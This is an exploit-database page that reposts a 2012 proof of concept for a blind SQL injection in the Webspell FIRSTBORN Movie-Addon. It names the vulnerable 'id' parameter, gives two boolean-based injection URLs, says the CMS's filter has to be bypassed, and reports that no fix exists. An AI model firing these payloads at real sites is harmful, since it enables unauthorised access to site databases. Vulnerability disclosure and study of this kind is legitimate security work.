Advertisement






Webspell FIRSTBORN Movie-Addon Blind SQL Injection

CVE Category Price Severity
CWE-89 Not disclosed High
Author Risk Exploitation Type Date
exploitalert.com High Remote 2012-06-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2012060114

Below is a copy:

===========
| # Title    : Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability
| # Author   : Easy Laster
| # Script   : Webspell FIRSTBORN Movie-Addon
| # Site     : www.firstborn.de
| # Price    : free
| # Exploitation : Remote Blind SQL Vulnerability
| # Bug      : Remote Blind SQL Vulnerability
| # Date     : 08.06.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
======================        Proof of Concept         =================================
   
   
  [+] Introduction
     
   FIRSTBORN Movie-Addon is a Addon for the Webspell Web Application for Content Management
   System. In this Addon we found a Remote Blind SQL Injection vulnerability.The Movie file
   is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most 
   Webspell Webapplication has a Security System in the Webspell core self.You must bypass
   the core from Webspell Security System (globalskiller).
    
   
  [+] Vulnerability
   
    http://[host]/[path]/index.php?site=movies&action=show&id=[vul]
   
  [+] Exploit
     
    http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=1--+
    http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=2--+
   
  [+] Fix
   
    No fix.



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.